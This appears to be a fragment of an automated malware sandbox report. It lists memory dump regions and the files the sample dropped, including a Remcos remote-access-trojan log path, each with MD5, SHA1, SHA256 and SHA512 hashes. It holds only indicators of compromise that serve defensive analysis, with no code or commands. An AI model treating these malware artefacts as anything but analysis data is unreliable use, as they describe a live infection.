memory/2168-11-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/2168-12-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/784-15-0x0000000004500000-0x0000000004536000-memory.dmp
memory/784-16-0x0000000004B80000-0x00000000051A8000-memory.dmp
memory/784-17-0x0000000004B20000-0x0000000004B42000-memory.dmp
memory/784-18-0x00000000052E0000-0x0000000005346000-memory.dmp
memory/784-19-0x0000000005350000-0x00000000053B6000-memory.dmp
memory/784-29-0x00000000054D0000-0x0000000005824000-memory.dmp
memory/784-30-0x00000000059D0000-0x00000000059EE000-memory.dmp
memory/784-31-0x0000000005A10000-0x0000000005A5C000-memory.dmp
memory/784-32-0x0000000007260000-0x00000000078DA000-memory.dmp
memory/784-33-0x0000000006C20000-0x0000000006C3A000-memory.dmp
memory/784-34-0x0000000006DE0000-0x0000000006E76000-memory.dmp
memory/784-35-0x0000000006D40000-0x0000000006D62000-memory.dmp
memory/784-36-0x0000000007E90000-0x0000000008434000-memory.dmp
C:\Users\Admin\AppData\Roaming\Narco.Fla
| MD5 | 5b31fdcca43851229c6ad5c0d5124d9e |
| SHA1 | 95243324bfd6acd008518e233e5ac3a7a29e67a5 |
| SHA256 | c288a9c83ad9236a539faddaaa2d90d0beb42cc28c9b2f8009676ccd15b6b842 |
| SHA512 | e4446a71ba0ce278980fdb6d286b55adcc97dd5b5a3c36da978de06916846bcc05cdf6ce8adb4176693b1d896c8ddd5499e37ab3ab08e8bac7468495c84038f5 |
memory/784-38-0x0000000008440000-0x000000000B10B000-memory.dmp
memory/2168-39-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/2168-46-0x00007FFE24C43000-0x00007FFE24C45000-memory.dmp
memory/2168-57-0x00007FFE24C40000-0x00007FFE25701000-memory.dmp
memory/3680-54-0x0000000001C70000-0x000000000493B000-memory.dmp
memory/2088-62-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5072-64-0x0000000000400000-0x0000000000457000-memory.dmp
memory/2088-66-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5072-65-0x0000000000400000-0x0000000000457000-memory.dmp
memory/2088-63-0x0000000000400000-0x0000000000478000-memory.dmp
memory/5044-73-0x0000000000400000-0x0000000000424000-memory.dmp
memory/5072-72-0x0000000000400000-0x0000000000457000-memory.dmp
memory/5044-71-0x0000000000400000-0x0000000000424000-memory.dmp
memory/5044-70-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bmnddfrn
| MD5 | 365f45018b7bcc98591979d6c4b23752 |
| SHA1 | 073aff125450845105f5daa7d0e7cc24ee8bbca5 |
| SHA256 | 27be905cdbf87c23851d00d61afd5fcfe5c72b1de227ac7d8c0dc5c7583c9a6e |
| SHA512 | 4bd0d2266c624b9ad40e9ba6cb4d63debd12f46f5c27afae3bfc20e3e7f5e9f9c88f83151166324223c5889034a4d70652cf747f6943af011191c64c28e18703 |
memory/3680-78-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
memory/3680-81-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
memory/3680-82-0x0000000020CC0000-0x0000000020CD9000-memory.dmp
C:\Users\Admin\remcos\logs.dat
| MD5 | 431cd2536a190a1c4f7b0038f9fa3e46 |
| SHA1 | d7b7dc357b619008284bb09d56b88b6ab8f74eb3 |
| SHA256 | 6cdb5757c487eb32b35e86e1c86725f55a8c443ceffd0adbf2f9ae54a44b762c |
| SHA512 | 4135eb3f0c395abc29e419d34c1ad2e34d98b3cf1042e53b0301e6293a05f343e27a04928702a08a9ac00bb889bddd4cf2fb0977a8abf6ff9706afa337387325 |